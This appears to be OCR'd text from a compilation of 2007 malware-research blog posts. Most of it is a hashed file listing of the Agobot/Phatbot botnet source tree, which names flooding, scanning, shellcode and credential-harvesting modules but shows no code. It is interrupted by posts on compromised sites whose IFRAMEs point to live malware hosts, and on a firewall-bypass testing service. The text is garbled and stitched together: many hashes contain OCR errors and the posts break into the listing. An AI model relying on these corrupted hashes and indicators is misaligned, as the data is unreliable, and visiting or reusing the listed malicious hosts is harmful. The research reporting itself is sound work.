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encoder.asm 
8998c716eb39128fdf7ceef3df356d38 
encoder.h 
28d40d1192f7e5d0b031b99c4a71a019 
encoder.txt 
a50b2bdbdf5e99ec7555153776d1a8d8 
agoshell.asm 
9cdaad7bcObaefc6clfcc9ed61d28cd7 
build.cmd 
eba8f780f6ea4e3b3d6f133281063c2a 
encoder.asm 
a26bd33d3701d1fb573bf236953db428 
encoder.h 
28d40d1192f7e5d0b031b99c4a71a019 
encoder.txt 
a50b2bdbdf5e99ec7555153776d1a8d8 
agobot3 console _nossl.exp 
4381cb413ea4eaef7940f4866b43cdcd 
agobot3 console _nossl.lib 
400b7f33573a9914c1957e7fa4d0e2e8 
agobot3 debug.exp 
0144120a939e9306db300d2f4d51374c 
agobot3 _debug.lib 
6b63d7f79202e2f70c32b682f2ce6b760 
agobot3 _nossl.exp 
c6395abe399a54dc0a9b5695a1la15e86 
agobot3 _nossl.lib 
992b690145852deb8d0c5cbb6ee0305d 
FSG-priv.exe 
00bd8f44c6176394caf6c018c23ea71b 
sample.cfg 
df23245c17d1cfc659c9442b843c604f 
agobug.jpg 
8480622e98fbaff360233ed8b1f2b8df 
apl.txt 
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bd595566bea4b6d20a7fee3cfe4970b8 
history-icon.gif 
7f42e80bf06c3fc688419e03da324991 


PCRE.txt 9c9b8344261c64bcd568a06a4bf4829e 


phatbot comparision.jpg 
38ca2a64d529cb525ff1f21f29b1a013 
phatbot control center.jpg 
33abc3e60b86d366c2c4cbec1cO5bf6d 
rules.txt 
fe6992efe2a3625a15alfd90776a7901 
Thumbs.db 
1f78c849ca8fabcb746a7bcc0727c49d 
Command Reference.htm 
4a9d2ea3a45c649ed0c5007f984a817d 
FAQ. htm 
541e7a64b64fc8042a22c67458e10e3c 
setting.css 
a8009d70a43172d23628edfb3791066f 
L.gif 
b47b8bb2d9d2363f5e44543207a0d161 
2.jpg 
7593f04b42ae8c3fad5d670cf99c752d 
3.jpg 
159c8ce559867e8a26f5929e0cla2b7c 
4.gif 
b6485aab665affel186cac24aef9895d9 
Executables.jpg 
dd889a5bf52101b74195ee848735e5c5 
Includes.jpg 
cc535d6be714bcalffb151dad1b09817 
Libraries.jpg 
9dc6ba5a519dbb8b57d73fecbal0fa62 
Thumbs.db 
1b9c1d949484bdf896c96bdffde15601 
template.cpp 
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09c2d5736f667a08e9373af9796509ee 
template.h 
da3161c9e6a73f79b9012ec0b9e354d7 
template _priv.cpp 
29a56623f45b38ed14eaae37d5aef27c 
template _priv.h 
59308f94b8b504048189cdadc74e497c 
ftplib.cpp 
1693dc58ba71a9e5e28alafef6f5 7df7 
ftplib.h 1643800fdcb5f8ac02b697172cdd9312 
Makefile.am 
820ccf5ce58507ae77638d9f38644064 
firedns.h 
576387df3f1c54943f57466ac50c6610 
libfiredns.a 
016dae4bc30bf5d8c7d44bc63d859cfb 
libfirestring.a 
2lad8ca62d4ebe5eed4970150c4a3256 
bittypes.h 
7834d7c2a8249a14596abc26ed3d07a9 
ip6 _misc.h 
703d7b6d9c46aabaa4b6713c293e2938 
pcap-bpf.h 
282bb8eb840d09510c66e86bccba9 1 bf 
pcap-stdinc.h 
451e66bb4ef185b099d6d10ca5723del 
pcap.h 
6fde982480980b05886436dacecb026d 
remote-ext.h 
8cda20004be42c3fbf897c863eef245b 
packet.lib 
3d427de6929e4b59646fec809e8b43b6 
packetd.lib 
e89fa9150c3a25dac71fba6401lafa8ba 
wpcap.lib 
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eee3a833ad82d66d8fb563a66d4e3ccd 
wpcapd.lib 
68fca37279eaff21fo6dd9c738a5bd37 
3dnow.h 
ef0d7947ea3fbee875166d804c4db2d7 
agobot3.dsp 
6dfd91b0be1d777ecea3ddf22a9d253d 
agobot3.dsw 

d6c9981589ecbee2 7fcd12f79624bdb4 
agobot3.ncb 
37e53dcb3b430edadad917d5d24d6197 
agobot3.opt 
495fd0c27ce18a00cfd9a49641509916 
agobot3.plg 
O0afc16868e3b4d1501cb2e3fla9bd2d 
agobot3.rc 
cb408ea8df789821eba4c5fd16fc5222 
apl.txt 
9b12255be30584c0bbc557a979d6cc8a 
baglescanner.cpp 
a0d6924b2651dbec8191a1e859e36e30 
bot.cpp 
161ed09b3ad26a97c3c2d8eb289db503 
bot.h 
1714eaaf97a167cc8679fe21a8bce8 OF 
build.h 
2a79b76430b78de84db3bc7a52467d94 
changes.txt 
Ofcd0e10c4879d9a272b6891370a0d44 
cmdbase.h 
26db6f0199a8036b090e9dd00e316475 
cmdline.cpp 
7d1782f3bb300e6459f21009c834d999 
cmdline.h 
3b94e2abdfab9092000d46070f96384d 
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cmdopt.h bbf99a918d54f3af9b8b8d3749f6d64e 
cmdshell.cpp 
953cc900136d6f2d122fe33ccf3fdf3e 
cmdshell.h 
5132962f81afb08c619e63298d108b4b 
commands.cpp 
862e80e6357cb358233d6298ff4cfb68 
commands.h 
2420ea568387994bd62c7b638ad358df 
consdbg.cpp 
f205b9ff0e4df2efccd265174a839e89 
consdbg.h 
8ae2f94dc08f997f066f04b4be998a39 
contrib.txt 
8399972deefe0714e2e7020ee2808a35 
cpanelscanner.cpp 
61ed4002d9e31834f6124ccf90ac60bb 
cplugin.cpp 
fd03a3cd1bfb177f92790d61b45b27b7 
cplugin.h 
f74efd5d9d520ca42e4b914c62ae51e5 
crypter.cpp 
belac4b3907cfd557446f6f48b97f8el 
crypter.h 
6730cee1lc317ba2de7fa21f5db91c5ae 
cstring.cpp 
b9ea3520f46d0255b6a0fb88d1e762f9 
cstring.h 
dc7c2de36c1130401d23c10abef7bcc6 
cthread.cpp 
325c9294240b2f6ad7d00308a3abf50d 
cthread.h 
94d7740c73ca407cdf63b720eb329fbf 
cvar.cpp 39a6c177266046a91c4df6080c69234a 
cvar.h 
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computernewsmagazine.com - Computer News 
theinternetstandardmag.com - The Internet Standard 
ceweekmag.com - CE Week Magazine 

ebusinessmag.com - Ebusiness Magazine 
healthcareitmagazine.com - Health Care IT Magazine 
serviceprovidermagazine.com - Service Provider Magazine 


Deobfuscating the obfuscated javascripts, we see that the first IFRAME points to : lilo- 
host.hk/cgi/index.php ; lilohost.hk/cgi/indexx.php ; lilohost.hk/cgi/tdss/index.php?o0ut=11923- 
69270 ; and lilohost.hk/cgi/indexx.php - where we get the actual malware under the umbrella 
of a typical WebAttacker obfuscation. The main index of the domain includes links to pharma- 
ceuticals, making it an interesting on in a combination with embedded malware. 


The second IFRAME points to 208.72.168.176/e-Sr1pt2210/index.php where we're greeted with 
the following message "asdfasdflt works!" and [3]a piece of [4]Trojan.Srizbi. 


Detection rate : Result: 8/31 (25.81 %) 

File size: 113152 bytes 

MD5: a4733e1901653da7086930588d699c85 

SHA1: 3e65be5e54b893cddf8f5f9bec2591425d49579a 


repairhddtech.com 
granddsip.net 
stepling.net 


softoneveryday.com 


leade 


fiderfox. info 
preveditd.net 


samsntafox.com 


It gets even more interesting with the following domains returning the same message within 
their indexes, and also hosted at the second IFRAME-ing IP - 208.72.168.176. Possibility 
Media’s vision states " New Media Making The Difference! " Indeed. 


Related posts: 
[5]Compromised Sites Serving Malware and Spam 
[6]Bank of India Serving Malware 
[7]U.S Consulate in St.Petersburg Serving Malware 
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c7b97e74ed6af153db6b7757dcee9c3a 
dcom2scanner.cpp 
5f23d2d93235790837580629bce46c5b 
dcomscanner.cpp 
a43a85cae7de83d189206754fec5d65e 
ddos.cpp 2ccb/7ce6c5cd1caa26da4b68a6762943 
ddos.h 
bcde4ab145fe958eff0d0bff62a2fe26 
debug.sh e69abc2d15e984622252df96cd1d81al 
disclaimer.txt 
e8ce5f964cb192fb125cle27ee8667d5 
doomscanner.cpp 
31cecf00ccc256b8b69af731d38c4e9c 
dwscanner.cpp 
8b377245bda4caa9805a6344810d1739 
gpl.txt 
393a5ca445f6965873eca0259al17f833 
harvest _aol.cpp 
0745c1f9337aabb2da52e934490741e5 
harvest _aol.h 
5ca26566806fd76c617804a53601047e 
harvest _cdkeys.cpp 
8bf6e1cab329d980b8b04a459a99a2af 
harvest _cdkeys.h 
2¢c8d4009435f04d4b0195365cf6db3e8 
harvest _emails.cpp 
Oafa8141e9b72222bb58bc9d8014867f 
harvest _emails.h 
041a05b157a3e79465f9beb0abt41esf 
harvest _registry.cpp 
dbf72b0beda3fac05423e49f19f9a636 
harvest _registry.h 
54f4301af575ece7b020334a57d044f0 
hook.cpp d0a4ea071585ebf86807cc2fb44cc77c 
hook.h 
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81692cbbcbda33288e764fcelcelaebe 
httpflood.cpp 
47a467c7a9396291386ed253e74f05a8 
installer.cpp 
f9d56fd9269f3375b9e2914d2e9f5ae2 
installer.h 
44a94935fd86a9728817696175324fic 
irc.cpp 
33c20db329774ded676a1aa43156f979 
irc.h 
eeal7498a62ec0c56ceac220980d46b0 
ircgate.cpp 
4f9371216f50179ed46648dfb9883f37 
ircgate.h 
80cb8943ae899d87d9eb2989fc8445de 
junoflood.cpp 
5162438538624d2e2391e3d31bbe2aa6 
locscanner.cpp 
4fbd88f4e057781c638c6f93979adf4c 
logic.cpp 
O8ce6fd0a02d6af21d8641laad9f768de 
logic.h 
3eebd3d75213c37818b2bb35c9f40b5c 
mac.cpp 
a84ff26fd17f1c084f27daa87fbodc507 
mac.h 
4ea570c11fe5223002b33a7089ddbc54 
main.h 
19e9cclfed78e89af70a257374c1029F 
mainctrl.cpp 
6c7ab1b4082b9f069c105970a6fabce6 
mainctrl.h 
5c96f4d11994c61442a4152281f37ef8 
Makefile 343ddb09044d2997a05b3856bacf8057 
Makefile.bc5 
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b9cb5ded5983a700afb138817428b519 
Makefile.ming 
1889ed95121d6f5394078e65487028ad 
Makefile.vc6 
c2f9374be2691c56030960150ab8bb7f 
message.h 
816b1b7d84db1960642f44e2655c180f 
nbscanner.cpp 
b810adb412e3b867e9f18b03aedef15d 
p2p.cpp 
9df216f299c4caf71d74f9e1a50a5181 
p2p.h 
33cf9dacal4ed6dcef8ffbd0051680c9 
phaticmp.cpp 
5fd424ec4ee918bcb245ef798421dbe7 
phatsyn.cpp 
645153e6a5db9e36c3974b78a3aa8b2e 
pingflood.cpp 
0d592db99aeab6c9becbh4e15d1d3cf3d 
polymorph.cpp 
85056a295106b4d7275560cf22e44274 
polymorph.h 
cael70a59593ffacab3a898962c6lalc 
random.cpp 
d5cc1078d40a30a000cfb5eb59dd28d1 
random.h 00ad1b05e533694170f55f688ac05422 
redirect.cpp 
8748b6d0e5a6cab6e711c5ddf636dc451 
redirect.h 
698715e7e32del4eaf0257f06abed44e 
redir _gre.cpp 
662d3b417cae78cff88bcfea6027d184 
redir _gre.h 
b143aaac61fc480e928eccf326fe8ce7 
redir http.cpp 
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fe8c2cf0f09dc51bd0173d5ee89bcf02 
redir _http.h 
58668d006562809f0ccda593d52f9e01 
redir https.cpp 
db42cf926b9d23921bfc781e941476ea 
redir https.h 
5829e683434a34aec3024c15bb84201d 
redir socks.cpp 
d69b14bf63c7e52c5662614e44e80f9c 
redir socks.h 
82¢c432c3f3e94eab48c3d156dd3506d7 
redir_tcp.cpp 
a25e7ca6f764137ala7568c007f90292 
redir_tcp.h 
a6d756ba1620cf70a5eee22f03b01640 
resource.h 
2b7b383879fa48367201leb6efcd93164 
rsalib.cpp 
3def23fc50249e85de2ae388cc5bad45 
rsalib.h cC22210651c07e4ad2a5241067f56c3al 
scanner.cpp 
5c6c9f46bd718a259e747427969ccacb 
scanner.h 
b0e7fe28flbcc3a3c53fc7d3a471a812 
sdcompat.cpp 
ce75e8ac16f1b8956ab361e43ae6e2fe 
sdcompat.h 
€3d3c73c697cab97599aa3f440f09de9 
shellcode.cpp 
a97cf083ac67a9e3a09006272bedf986 
shellcode.h 
756ae88719f7771528a3e7dd6247321b 
smtp.cpp b2aa5cf91a158317e28d102e75c6fccc 
smtp.h 
1¢99aa5c145a45d53f285187688846fc 
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smtp _logic.cpp 
28d67a63c627beee86724586bc62abaa 
smtp _logic.h 
ed0789930b4d55784fdf8012bb39e402 
sniffer.cpp 
827f191faaebeleO06af5aee7da59d0c5 
sniffer.h 
264699ee4ecf70dd1c455f171331e14e 
sockets.cpp 
19b2648edac46d38434c5859bb79d38d 
sockets.h 
afe300e0252ea4280cbad6be8b3ab9c1 
ssllib.cpp 
93f221ee128029091531fd6c2d359d97 
ssllib.h 7fl2ceefo398cc9dd02ca8209ale693c 
synflood.cpp 
44c637f068f38111493e30ae6061e857 
todo.txt 604ff9fea760d20f08ad285c48fb69ce 
udpflood.cpp 
1f8aa95a5a34e383b64a6fa6ad813488 
utility.cpp 
24bc88921e5b08af0baf2aaf0fb64817 
utility.h 
f6503b7f3613a77e535bd284660cefb3 
wdscanner.cpp 
ee2ab8ae6bd716942ff34636a51b22a0 
wksscanner.cpp 
d519b0cc8f399a44ec333a7cefa77d76 
wonk.cpp 4ff777d62f78b958bad75f1217ec7d03 
dir-prop-base 
c73e8407bc1d00e4c2ff02fbe21ff597 
dir-props 
c73e8407bc1d00e4c2ff02fbe21ff597 
empty-file 


entries 
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04399cla2a5ad191cc6a0dc4bfb786a6 
format 
48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
3dnow.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
agobot3.dsp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
agobot3.dsw.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
agobot3.rc.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
apl.txt.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
baglescanner.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
bot.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
bot.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
build.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
changes.txt.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
cmdbase.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
cmdline.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
cmdline.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
cmdopt.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
cmdshell.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
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cmdshell.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
commands.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
commands.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
consdbg.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
consdbg.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
contrib.txt.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
cplugin.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
cplugin.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
crypter.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
crypter.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
cstring.cpp.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
cstring.h.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
cthread.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
cthread.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
cvar.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
cvar.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
dcom2scanner.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 


dcomscanner.cpp.svn-base 
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2d2977d1c96f487abe4ale202dd03b4e 
ddos.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ddos.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
debug.sh.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
disclaimer.txt.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
doomscanner.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
dwscanner.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
gpl.txt.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _aol.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _aol.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _cdkeys.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _cdkeys.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _emails.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _emails.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _registry.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _registry.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
hook.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
hook.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
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httpflood.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
installer.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
installer.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
irc.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
irc.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
ircgate.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ircgate.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
junoflood.cpp.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
locscanner.cpp.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
logic.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
logic.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
mac.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
mac.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
main.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
mainctrl.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
mainctrl.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile.bc5.svn-base 
202977d1c96f487abe4ale202dd03b4e 


Makefile.ming.svn-base 
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2d2977d1c96f487abe4ale202dd03b4e 
Makefile.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile.vc6.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
message.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
nbscanner.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
p2p.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
p2p.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
phaticmp.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
phatsyn.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pingflood.cpp.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
polymorph.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
polymorph.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
random.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
random.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
redirect.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
redirect.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
redir_gre.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
redir_gre.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
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[8]Syrian Embassy in London Serving Malware 
[9]CISRT Serving Malware 


http: //ddanchev. blogspot .com/2007/10/compromised-sites-serving-malware-and.htm 
http: //ddanchev. blogspot .com/2007/08/bank- of - india-serving-malware .htm 


. http: //ddanchev. blogspot .com/2007/09/us-consulate-st-petersburg-serving .htm 


http: //ddanchev. blogspot .com/2007/09/syrian- embassy-in-london-serving.htm 


. http: //ddanchev. blogspot .com/2007/10/cisrt-serving-malware .htm 


WO ONAMWRWNE 


3.10.29 Multiple Firewalls Bypassing Verification on Demand (2007-10-29 13:46) 


(CD Security Settings 


Frewal | — IntrusionPrevertion | — LoggingandTracng | 
AppicationContiol | Buffer Overflow Exploit Prevention || Anfivirus/Anti-Spyware 


I Enable Application Control 


Known Applications 


Detect appication using 


1 Path [C\Program Fies\Messenger\nemags exe --Browse. | 


port 
Cor 
port 
Cor 
port 
port 


When the application tnes to connect to a network 
© Letit connect 
© Block the connection 
© Terminate 2 


Next to the [1]proprietary malware tools, [2]malware as a web service, [3]Shark2’s built-in 
VirusTotal submission, the numerous [4]malware crypting on demand services, the complete 
outsourcing of spam in the form of a "[5]managed spamming appliance", and the built-in 
[6]firewall and anti virus killing capabilities in commodity DIY malware droppers, all indicate 
that the dynamics of the malware industry are once again shifting towards a service based 
economy with a recently offered multiple firewall bypassing verification on demand service. 
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redir http.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
redir _http.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
redir _https.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
redir_https.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
redir socks.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
redir socks.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
redir_tcp.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
redir_tcp.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
resource.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
rsalib.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
rsalib.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
scanner.cpp.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
scanner.h.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
sdcompat.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
sdcompat.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
shellcode.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
shellcode.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 


smtp.cpp.svn-base 
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2d2977d1c96f487abe4ale202dd03b4e 
smtp.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
smtp _logic.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
smtp _logic.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sniffer.cop.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sniffer.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sockets.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sockets.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ssllib.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ssllib.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
synflood.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
todo.txt.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
udpflood.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
utility.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
utility.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
wdscanner.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
wksscanner.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
wonk.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
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3dnow.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
agobot3.dsp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
agobot3.dsw.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
agobot3.rc.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
apl.txt.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
baglescanner.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
bot.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
bot.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
build.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
changes.txt.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cmdbase.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cmdline.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cmdline.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cmdopt.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cmdshell.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cmdshell.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
commands.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 


commands.h.svn-work 
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2d2977d1c96f487abe4ale202dd03b4e 
consdbg.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
consdbg.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
contrib.txt.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cplugin.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cplugin.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
crypter.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
crypter.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cstring.cpp.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
cstring.h.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
cthread.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cthread.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cvar.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cvar.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
dcom2scanner.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
dcomscanner.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ddos.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ddos.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
11396 


debug.sh.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
disclaimer.txt.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
doomscanner.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
dwscanner.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
gpl.txt.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _aol.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _aol.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _cdkeys.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _cdkeys.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _emails.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _emails.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _registry.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
harvest _registry.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
hook.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
hook.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
httpflood.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
installer.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 


installer.h.svn-work 
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2d2977d1c96f487abe4ale202dd03b4e 
irc.cop.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
irc.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ircgate.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ircgate.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
junoflood.cpp.svn-work 
4160c74de5f4e580dc15660c798ff9Ffc 
locscanner.cpp.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
logic.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
logic.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
mac.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
mac.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
main.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
mainctrl.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
mainctrl.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile.bc5.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile. ming.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile.vc6.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
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message.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
nbscanner.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
p2p.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
p2p.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
phaticmp.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
phatsyn.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pingflood.cpp.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
polymorph.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
polymorph.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
random.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
random.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
redirect.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
redirect.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
redir _gre.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
redir _gre.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
redir http.cpp.svn-work 
